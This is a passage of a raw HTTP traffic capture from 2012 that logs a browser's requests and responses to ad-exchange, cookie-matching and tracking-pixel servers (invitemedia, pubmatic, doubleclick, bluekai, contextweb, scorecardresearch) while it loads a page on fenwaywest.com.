01:30:40 GMT;Max-Age=31536000 io_freq_p1=&quot;eJzjkuF4eYtRgFHiwJcFrawKjBoHpi9rZTVgtADzAZ8WCxE=&quot;;Version=1;Path=/;Domain=invitemedia.com;Expires=Mon, 18-Nov-2013 01:30:40 GMT;Max-Age=31536000 impressions=;Path=/;Domain=invitemedia.com;Expires=Thu, 01-Jan-1970 00:00:01 GMT clicks=;Path=/;Domain=invitemedia.com;Expires=Thu, 01-Jan-1970 00:00:01 GMT segments=;Path=/;Domain=invitemedia.com;Expires=Thu, 01-Jan-1970 00:00:01 GMT frequency=;Path=/;Domain=invitemedia.com;Expires=Thu, 01-Jan-1970 00:00:01 GMT io_frequency=;Path=/;Domain=invitemedia.com;Expires=Thu, 01-Jan-1970 00:00:01 GMT
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC&quot;
Cache-Control: no-cache
Location: http://cm.g.doubleclick.net/pixel?google_sc&amp;google_nid=invitemedia&amp;google_cm&amp;google_hm=9FiD2qWyQimS5cy1GNR4cg==
Content-Length: 0
Connection: close
Server: Jetty(7.3.1.v20110307)
GET /AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTM5MCZ0bD0xMjk2MDA%3D&piggybackCookie=3f62d100-dd98-4006-b187-452598b27a1b. HTTP/1.1

Host: image2.pubmatic.com
GET /AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTM5MCZ0bD0xMjk2MDA%3D&amp;piggybackCookie=3f62d100-dd98-4006-b187-452598b27a1b. HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=28596&amp;s=28597
Cookie: PUBMDCID=3; KADUSERCOOKIE=7577C4DA-3995-4153-9A0B-7C9927BF1013; pubfreq_28597=; pubtime_28597=TMC; _curtime=1353202240; pubfreq_28597_24364_1667996297=243-1; PMDTSHR=cat:; KTPCACOOKIE=YES; SYNCUPPIX_ON=YES; DPPIX_ON=YES
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Sun, 18 Nov 2012 01:30:40 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.8e-fips-rhel5 mod_fastcgi/2.4.2
Set-Cookie: KRTBCOOKIE_80=1336-3f62d100-dd98-4006-b187-452598b27a1b.; domain=pubmatic.com; expires=Tue, 18-Nov-2014 01:30:40 GMT; path=/ PUBRETARGET=390_1360978240; domain=pubmatic.com; expires=Sat, 16-Feb-2013 01:30:40 GMT; path=/
Content-Length: 42
P3P: CP=&quot;NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC&quot;
Connection: close
GET /pixel?google_sc&google_nid=invitemedia&google_cm&google_hm=9FiD2qWyQimS5cy1GNR4cg== HTTP/1.1

Host: cm.g.doubleclick.net
GET /pixel?google_sc&amp;google_nid=invitemedia&amp;google_cm&amp;google_hm=9FiD2qWyQimS5cy1GNR4cg== HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://eeu.rtb.prod2.invitemedia.com/build_creative?click_url=http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet?clickData=tG8AALVvAAAsXwAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAAKAAAABYAgAACgAAAAAAAAACAAAANzU3N0M0REEtMzk5NS00MTUzLTlBMEItN0M5OTI3QkYxMDEzAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAAAAAAAAAAAAD///////////////8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA_url=&amp;cost=0.4054&amp;creative_id=378898&amp;zip_code=unknown&amp;referrer_url=http%253A%252F%252Fwww.shinynylonarts.com%252F&amp;exch_id=7&amp;line_item_id=1882693&amp;b=rh56.ovq.wiz.cebq2&amp;source_url=http%3A%2F%2Fwww.yardbarker.com&amp;auction_id=01CE9407-4555-4091-9684-D2171C6AAB19&amp;us_id=5543&amp;invite_uid=&amp;pub_line_item_id=87821&amp;mapped_uid=7-7577C4DA-3995-4153-9A0B-7C9927BF1013&amp;inv_size_id=146840&amp;campaign_id=252144&amp;p_us_id=28812
Cookie: id=223ae1776901005b||t=1350343758|et=730|cs=002213fd480aa30e9cef2f5d42
HTTP/1.1 302 Found

Content-Type: text/html; charset=UTF-8
Location: http://g-pixel.invitemedia.com/gmatcher?google_gid=CAESEE5Cd4RhtyLOx5zauejuLUM&amp;google_cver=1
Date: Sun, 18 Nov 2012 01:30:40 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Server: Cookie Matcher
Content-Length: 293
X-XSS-Protection: 1; mode=block
GET /gmatcher?google_gid=CAESEE5Cd4RhtyLOx5zauejuLUM&google_cver=1 HTTP/1.1

Host: g-pixel.invitemedia.com
GET /gmatcher?google_gid=CAESEE5Cd4RhtyLOx5zauejuLUM&amp;google_cver=1 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://eeu.rtb.prod2.invitemedia.com/build_creative?click_url=http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet?clickData=tG8AALVvAAAsXwAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAAKAAAABYAgAACgAAAAAAAAACAAAANzU3N0M0REEtMzk5NS00MTUzLTlBMEItN0M5OTI3QkYxMDEzAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAAAAAAAAAAAAD///////////////8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA_url=&amp;cost=0.4054&amp;creative_id=378898&amp;zip_code=unknown&amp;referrer_url=http%253A%252F%252Fwww.shinynylonarts.com%252F&amp;exch_id=7&amp;line_item_id=1882693&amp;b=rh56.ovq.wiz.cebq2&amp;source_url=http%3A%2F%2Fwww.yardbarker.com&amp;auction_id=01CE9407-4555-4091-9684-D2171C6AAB19&amp;us_id=5543&amp;invite_uid=&amp;pub_line_item_id=87821&amp;mapped_uid=7-7577C4DA-3995-4153-9A0B-7C9927BF1013&amp;inv_size_id=146840&amp;campaign_id=252144&amp;p_us_id=28812
Cookie: uid=f45883da-a5b2-4229-92e5-ccb518d47872; dp_rec=&quot;{\&quot;4\&quot;:1353202240}&quot;; camp_freq_p1=&quot;eJzjkuH4sJFfgFHiwJcFrawKjBoHpi9rZTVgtADzAZ0HCv0=&quot;; exchange_uid=&quot;eyI3IjpbIjc1NzdDNERBLTM5OTUtNDE1My05QTBCLTdDOTkyN0JGMTAxMyIsNzM0ODI1XX0=&quot;; impressions_p1=&quot;eJzjcuRgF1IxMHR2tTQxMNc1MTU11TUxsDTUtTSzMNF1MTI0N3Q2c3R0MrSUOPBlQSurwtEvRRozfnMY9K5jtViuHdHzkBEAClwTeA==&quot;; io_freq_p1=&quot;eJzjkuF4eYtRgFHiwJcFrawKjBoHpi9rZTVgtADzAZ8WCxE=&quot;
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Sun, 18 Nov 2012 01:30:40 GMT
Set-Cookie: exchange_uid=eyI3IjpbIjc1NzdDNERBLTM5OTUtNDE1My05QTBCLTdDOTkyN0JGMTAxMyIsNzM0ODI1XSwiNCI6WyJDQUVTRUU1Q2Q0Umh0eUxPeDV6YXVlanVMVU0iLDczNDgyNV19;Path=/;Domain=invitemedia.com;Expires=Mon, 18-Nov-2013 01:30:40 GMT impressions=;Path=/;Domain=invitemedia.com;Expires=Thu, 01-Jan-1970 00:00:01 GMT clicks=;Path=/;Domain=invitemedia.com;Expires=Thu, 01-Jan-1970 00:00:01 GMT segments=;Path=/;Domain=invitemedia.com;Expires=Thu, 01-Jan-1970 00:00:01 GMT frequency=;Path=/;Domain=invitemedia.com;Expires=Thu, 01-Jan-1970 00:00:01 GMT io_frequency=;Path=/;Domain=invitemedia.com;Expires=Thu, 01-Jan-1970 00:00:01 GMT
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC&quot;
Cache-Control: no-cache
Content-Length: 43
Connection: close
Server: Jetty(7.3.1.v20110307)
GET /pixel.gif HTTP/1.1

Host: load.s3.amazonaws.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/dppix.html?p=28596&amp;s=28597&amp;a=24364
HTTP/1.1 200 OK

Content-Type: image/gif
x-amz-id-2: wHZKu7aDKpJls0bL4W1RcmDILKlXV4T4XKDlx2XO1ngEwWrxsi7dADvSavXxBQVt
x-amz-request-id: CB1B0A20737E9B68
Date: Sun, 18 Nov 2012 01:30:42 GMT
x-amz-meta-s3fox-filesize: 43
x-amz-meta-s3fox-modifiedtime: 1297679395316
Last-Modified: Mon, 14 Feb 2011 11:09:26 GMT
Etag: &quot;fc94fb0c3ed8a8f909dbc7630a0987ff&quot;
Accept-Ranges: bytes
Content-Length: 43
Server: AmazonS3
GET /site/2748?rg=production_bua&redir=http%3A%2F%2Fsegment-pixel.invitemedia.com%2Fset_partner_uid%3FpartnerID%3D84%26partnerUID%3D%24_BK_UUID%26sscs_active%3D1 HTTP/1.1

Host: tags.bluekai.com
GET /site/2748?rg=production_bua&amp;redir=http%3A%2F%2Fsegment-pixel.invitemedia.com%2Fset_partner_uid%3FpartnerID%3D84%26partnerUID%3D%24_BK_UUID%26sscs_active%3D1 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://pixel.invitemedia.com/data_sync?partner_id=230&amp;exchange_id=8
HTTP/1.1 302 Found

Content-Type: text/html
Date: Sun, 18 Nov 2012 01:30:41 GMT
Server: Apache/2.2.3 (CentOS)
P3P: CP=&quot;NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV&quot;, policyref=&quot;http://tags.bluekai.com/w3c/p3p.xml&quot;
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Location: http://segment-pixel.invitemedia.com/set_partner_uid?partnerID=84&amp;partnerUID=5FWOwy9999e21vCx&amp;sscs_active=1
Set-Cookie: bkc=KJpM8sJQteS5QzcHSAD99hOy9FZkDNc8YVCXHQRW4yIxF0rRYRUwzQCPFk6JkHdeQr9e9W0FauQ=; expires=Fri, 17-May-2013 01:30:41 GMT; path=/; domain=.bluekai.com bklc=0; expires=Fri, 17-May-2013 01:30:41 GMT; path=/; domain=.bluekai.com bko=; expires=Fri, 17-May-2013 01:30:41 GMT; path=/; domain=.bluekai.com bkp1=; expires=Fri, 17-May-2013 01:30:41 GMT; path=/; domain=.bluekai.com bkst=KJhMR5Mehze9pkYSk8tUU8f7SnDi999ooyPP; expires=Fri, 17-May-2013 01:30:41 GMT; path=/; domain=.bluekai.com bku=F9G99WWb3aevIyWd; expires=Fri, 17-May-2013 01:30:41 GMT; path=/; domain=.bluekai.com bkw5=; expires=Fri, 17-May-2013 01:30:41 GMT; path=/; domain=.bluekai.com bkdc=snv; expires=Tue, 18-Dec-2012 01:30:41 GMT; path=/; domain=.bluekai.com
BK-Server: 4a8f
Content-Length: 0
GET /set_partner_uid?partnerID=84&partnerUID=5FWOwy9999e21vCx&sscs_active=1 HTTP/1.1

Host: segment-pixel.invitemedia.com
GET /set_partner_uid?partnerID=84&amp;partnerUID=5FWOwy9999e21vCx&amp;sscs_active=1 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://pixel.invitemedia.com/data_sync?partner_id=230&amp;exchange_id=8
Cookie: uid=f45883da-a5b2-4229-92e5-ccb518d47872; dp_rec=&quot;{\&quot;4\&quot;:1353202240}&quot;; camp_freq_p1=&quot;eJzjkuH4sJFfgFHiwJcFrawKjBoHpi9rZTVgtADzAZ0HCv0=&quot;; exchange_uid=eyI3IjpbIjc1NzdDNERBLTM5OTUtNDE1My05QTBCLTdDOTkyN0JGMTAxMyIsNzM0ODI1XSwiNCI6WyJDQUVTRUU1Q2Q0Umh0eUxPeDV6YXVlanVMVU0iLDczNDgyNV19; impressions_p1=&quot;eJzjcuRgF1IxMHR2tTQxMNc1MTU11TUxsDTUtTSzMNF1MTI0N3Q2c3R0MrSUOPBlQSurwtEvRRozfnMY9K5jtViuHdHzkBEAClwTeA==&quot;; io_freq_p1=&quot;eJzjkuF4eYtRgFHiwJcFrawKjBoHpi9rZTVgtADzAZ8WCxE=&quot;
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Sun, 18 Nov 2012 01:30:41 GMT
Set-Cookie: partnerUID=&quot;eyI4NCI6WyI1RldPd3k5OTk5ZTIxdkN4Iix0cnVlXX0=&quot;;Version=1;Path=/;Domain=invitemedia.com;Expires=Mon, 18-Nov-2013 01:30:41 GMT;Max-Age=31536000 impressions=;Path=/;Domain=invitemedia.com;Expires=Thu, 01-Jan-1970 00:00:01 GMT clicks=;Path=/;Domain=invitemedia.com;Expires=Thu, 01-Jan-1970 00:00:01 GMT segments=;Path=/;Domain=invitemedia.com;Expires=Thu, 01-Jan-1970 00:00:01 GMT frequency=;Path=/;Domain=invitemedia.com;Expires=Thu, 01-Jan-1970 00:00:01 GMT io_frequency=;Path=/;Domain=invitemedia.com;Expires=Thu, 01-Jan-1970 00:00:01 GMT
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC&quot;
Cache-Control: no-cache
Content-Length: 43
Connection: close
Server: Jetty(7.3.1.v20110307)
GET /javascripts/ncomments.js HTTP/1.1

Host: livefyre.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 302 Found

HTTP/1.1 302 Found
Cache-Control: no-cache
Content-Length: 0
Location: http://www.livefyre.com/javascripts/ncomments.js
Connection: close
GET /javascripts/ncomments.js HTTP/1.1

Host: www.livefyre.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: application/javascript
Accept-Ranges: bytes
Age: 46
Cache-Control: max-age=3600
Content-Encoding: gzip
Date: Sun, 18 Nov 2012 01:30:42 GMT
Etag: &quot;72e0-4cd778e79ec80&quot;
Expires: Sun, 18 Nov 2012 02:29:55 GMT
Last-Modified: Thu, 01 Nov 2012 23:41:22 GMT
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR CURa OUR NOR&quot;
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Via: 1.1 varnish
X-Cache: HIT
X-Cache-Hits: 5
X-Served-By: usea1l3vf41.livefyre.com
X-Server: apache_lfadmin_2
X-Varnish: 1426482160 1426459436
Content-Length: 6792
Connection: keep-alive
GET /TagPublish/GetAd.aspx?tagver=1&cp=520266&ct=66902&cn=1&crtg=&cwod=&epid=&esid=&ifurl=&tppg=&cf=160X600&rq=1&dw=300&cwu=http%3A%2F%2Fwww.shinynylonarts.com%2F&cwr=&mrnd=84914336&if=1&tl=-1&pxy=&cxy=&dxy=&tz=-60&ln=en-US HTTP/1.1

Host: tag.contextweb.com
GET /TagPublish/GetAd.aspx?tagver=1&amp;cp=520266&amp;ct=66902&amp;cn=1&amp;crtg=&amp;cwod=&amp;epid=&amp;esid=&amp;ifurl=&amp;tppg=&amp;cf=160X600&amp;rq=1&amp;dw=300&amp;cwu=http%3A%2F%2Fwww.shinynylonarts.com%2F&amp;cwr=&amp;mrnd=84914336&amp;if=1&amp;tl=-1&amp;pxy=&amp;cxy=&amp;dxy=&amp;tz=-60&amp;ln=en-US HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: C2W4=CT-USR; cw=cw
HTTP/1.1 302 Moved Temporarily

HTTP/1.1 302 Moved Temporarily
Server: AkamaiGHost
Content-Length: 0
Location: http://ak1.abmr.net/is/tag.contextweb.com?U=/TagPublish/GetAd.aspx&amp;V=3-GP7nXNdm0%2fxldckLgI5b6HiF%2fTBIyuxUXrCk2F96Q++WsNq2niCi4+0LlWIpj22j&amp;I=CE40300D937EA33&amp;D=contextweb.com&amp;01AD=1&amp;tagver=1&amp;cp=520266&amp;ct=66902&amp;cn=1&amp;crtg=&amp;cwod=&amp;epid=&amp;esid=&amp;ifurl=&amp;tppg=&amp;cf=160X600&amp;rq=1&amp;dw=300&amp;cwu=http%3A%2F%2Fwww.shinynylonarts.com%2F&amp;cwr=&amp;mrnd=84914336&amp;if=1&amp;tl=-1&amp;pxy=&amp;cxy=&amp;dxy=&amp;tz=-60&amp;ln=en-US
Date: Sun, 18 Nov 2012 01:30:42 GMT
Connection: keep-alive
Set-Cookie: C2W4=CT-1; expires=Sun, 16-Dec-2012 01:30:42 GMT; path=/; domain=.contextweb.com
GET /is/tag.contextweb.com?U=/TagPublish/GetAd.aspx&V=3-GP7nXNdm0%2fxldckLgI5b6HiF%2fTBIyuxUXrCk2F96Q++WsNq2niCi4+0LlWIpj22j&I=CE40300D937EA33&D=contextweb.com&01AD=1&tagver=1&cp=520266&ct=66902&cn=1&crtg=&cwod=&epid=&esid=&ifurl=&tppg=&cf=160X600&rq=1&dw=300&cwu=http%3A%2F%2Fwww.shinynylonarts.com%2F&cwr=&mrnd=84914336&if=1&tl=-1&pxy=&cxy=&dxy=&tz=-60&ln=en-US HTTP/1.1

Host: ak1.abmr.net
GET /is/tag.contextweb.com?U=/TagPublish/GetAd.aspx&amp;V=3-GP7nXNdm0%2fxldckLgI5b6HiF%2fTBIyuxUXrCk2F96Q++WsNq2niCi4+0LlWIpj22j&amp;I=CE40300D937EA33&amp;D=contextweb.com&amp;01AD=1&amp;tagver=1&amp;cp=520266&amp;ct=66902&amp;cn=1&amp;crtg=&amp;cwod=&amp;epid=&amp;esid=&amp;ifurl=&amp;tppg=&amp;cf=160X600&amp;rq=1&amp;dw=300&amp;cwu=http%3A%2F%2Fwww.shinynylonarts.com%2F&amp;cwr=&amp;mrnd=84914336&amp;if=1&amp;tl=-1&amp;pxy=&amp;cxy=&amp;dxy=&amp;tz=-60&amp;ln=en-US HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: 01AI=2-2-AD16F36B0852D6731F71B66C9E99A74320FC050BD9D65639E78B8E53FCD3065D-31B15099DE8AFA1D2CEAF2ABF17328DDABF99BFA32659F9934AE7886A0C24022
HTTP/1.1 302 Moved Temporarily

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://tag.contextweb.com/TagPublish/GetAd.aspx?01AD=3hj8VJekE1xLFEu52vJsr0gR__DD7av_eKsLGmaFwbkP3DUjJz8gRIA&amp;01RI=CE40300D937EA33&amp;01NA=&amp;tagver=1&amp;cp=520266&amp;ct=66902&amp;cn=1&amp;crtg=&amp;cwod=&amp;epid=&amp;esid=&amp;ifurl=&amp;tppg=&amp;cf=160X600&amp;rq=1&amp;dw=300&amp;cwu=http%3A%2F%2Fwww.shinynylonarts.com%2F&amp;cwr=&amp;mrnd=84914336&amp;if=1&amp;tl=-1&amp;pxy=&amp;cxy=&amp;dxy=&amp;tz=-60&amp;ln=en-US
Expires: Sun, 18 Nov 2012 01:30:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 18 Nov 2012 01:30:42 GMT
Connection: keep-alive
Set-Cookie: 01AI=2-2-A80672088C2B1603DE0FC54D1DC470123A9C7548103393117CBE614A57F6787A-BA6109EF4CE41A68EB0E6F1A36F27A8EFFFBAD9FB723A834CF903735D2B947FF; expires=Mon, 18-Nov-2013 01:30:42 GMT; path=/; domain=.abmr.net
P3P: policyref=&quot;http://www.abmr.net/w3c/policy.xml&quot;, CP=&quot;NON DSP COR CURa ADMa DEVa OUR SAMa IND&quot;
GET /TagPublish/GetAd.aspx?01AD=3hj8VJekE1xLFEu52vJsr0gR__DD7av_eKsLGmaFwbkP3DUjJz8gRIA&01RI=CE40300D937EA33&01NA=&tagver=1&cp=520266&ct=66902&cn=1&crtg=&cwod=&epid=&esid=&ifurl=&tppg=&cf=160X600&rq=1&dw=300&cwu=http%3A%2F%2Fwww.shinynylonarts.com%2F&cwr=&mrnd=84914336&if=1&tl=-1&pxy=&cxy=&dxy=&tz=-60&ln=en-US HTTP/1.1

Host: tag.contextweb.com
GET /TagPublish/GetAd.aspx?01AD=3hj8VJekE1xLFEu52vJsr0gR__DD7av_eKsLGmaFwbkP3DUjJz8gRIA&amp;01RI=CE40300D937EA33&amp;01NA=&amp;tagver=1&amp;cp=520266&amp;ct=66902&amp;cn=1&amp;crtg=&amp;cwod=&amp;epid=&amp;esid=&amp;ifurl=&amp;tppg=&amp;cf=160X600&amp;rq=1&amp;dw=300&amp;cwu=http%3A%2F%2Fwww.shinynylonarts.com%2F&amp;cwr=&amp;mrnd=84914336&amp;if=1&amp;tl=-1&amp;pxy=&amp;cxy=&amp;dxy=&amp;tz=-60&amp;ln=en-US HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: C2W4=CT-1; cw=cw
HTTP/1.1 200 OK

Content-Type: application/x-javascript;charset=utf-8
Server: GlassFish v3
P3P: policyref=&quot;/TagPublish/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT&quot;, policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT&quot;
Cache-Control: private, max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
CWDL: 12/120
CW-Server: LGA-APP216
Content-Encoding: gzip
Date: Sun, 18 Nov 2012 01:30:42 GMT
Content-Length: 891
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: C2W4=3hj8VJekE1xLFEu52vJsr0gR__DD7av_eKsLGmaFwbkP3DUjJz8gRIA; expires=Sun, 16-Dec-2012 01:30:42 GMT; path=/; domain=.contextweb.com 66902_160X600__POSUNKNOWNXUNKNOWN=EMPTY; Domain=.contextweb.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ 66902_160X600__POSUNKNOWNXUNKNOWN=1353202367221; Domain=.contextweb.com; Expires=Sun, 18-Nov-2012 01:32:57 GMT; Path=/ V=A4M4pJeeQdJ7; Domain=.contextweb.com; Expires=Wed, 13-Nov-2013 01:32:47 GMT; Path=/ vf=1; Domain=.contextweb.com; Expires=Sun, 18-Nov-2012 05:00:00 GMT; Path=/ wf=0; Domain=.contextweb.com; Expires=Sat, 24-Nov-2012 05:00:00 GMT; Path=/
GET /beacon.js HTTP/1.1

Host: b.scorecardresearch.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: UID=546eda-195.159.219.9-1353202238; UIDR=1353202238
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Encoding: gzip
Expires: Sun, 02 Dec 2012 01:30:42 GMT
Date: Sun, 18 Nov 2012 01:30:42 GMT
Content-Length: 1140
Connection: keep-alive
Cache-Control: private, no-transform, max-age=1209600
GET /b?c1=8&c2=2102&c3=0&c4=&c5=&c15=&c16=&ns__t=1353202242463&ns_c=UTF-8&c8=http%3A%2F%2Fwww.fenwaywest.com%2Findex.php%3Foption%3Dcom_content%26amp%3Bview%3Darticle%26amp%3Bid%3D7%26amp%3BItemid%3D101&c7=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&c9=http%3A%2F%2Fwww.shinynylonarts.com%2F HTTP/1.1

Host: b.scorecardresearch.com
